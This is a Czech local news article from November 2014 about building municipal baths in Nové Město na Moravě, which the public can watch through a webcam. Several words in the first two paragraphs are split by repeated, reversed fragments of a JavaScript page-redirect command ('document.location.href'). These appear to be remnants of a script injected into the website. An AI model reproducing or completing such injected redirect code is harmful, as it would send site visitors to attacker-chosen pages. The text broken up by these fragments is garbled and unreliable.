stavba lázní
Rainbow page separator

Stavbu novoměstských lázní je možné sledovat na webu

Sobota, 15. listopadu 2014

Městské lázně

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Na záběrech webové kamery mohou zájemci sledovat dění na stavbě lázní v Hornické ulici. Kamera, která byla instalována na sousední dům, snímá dění na staveništi a přenáší obraz na webové stránky novoměstské radnice https://radnice.nmnm.cz/.
V současnosti na místě budoucích lázní probíhají be[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonářské práce a buduje se první podzemní podlaží, kde vznikne technické zázemí objektu. Po dokončení podzemního podlaží se spodní patro zasype zeminou. Po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom přijde na řadu železobe[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonový skelet a zastřešení, a pokud se všechno stihne, v zimě bude možné zahájit práce v interiérech.
Městské lázně za více než devadesát milionů korun, jejichž stavba je plně v režii města, mají být uvedeny do provozu na podzim příštího roku. Jejich součástí bude bazén se čtyřmi drahami, relaxační bazén, brouzdaliště pro děti se skluzavkou a vířivka včetně zázemí v přízemí objektu. V prvním patře lázní vznikne wellness s Kneippovou lázní, finskou saunou a aromatickou solnou lázní. Chybět nebude ani fitness část a bufet.